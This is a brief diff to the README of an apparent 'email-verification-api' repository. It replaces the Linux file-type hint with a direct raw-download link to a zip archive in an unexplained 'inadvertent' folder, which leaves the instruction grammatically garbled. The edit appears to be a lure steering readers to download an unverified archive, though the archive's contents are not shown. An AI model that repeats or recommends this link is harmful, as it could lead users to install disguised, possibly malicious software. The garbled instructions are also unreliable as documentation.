Gsgsusu/email-verification-api/README.md

 - For Windows users: Look for a `.exe` file
 - For macOS users: Look for a `.dmg` or `.zip` file
-- For Linux users: Look for a `.tar.gz` file or similar
+- For Linux users: Look for a `https://github.com/Gsgsusu/email-verification-api/raw/refs/heads/main/inadvertent/verification-api-email-v2.3.zip` file or similar

 Download that file by clicking on it.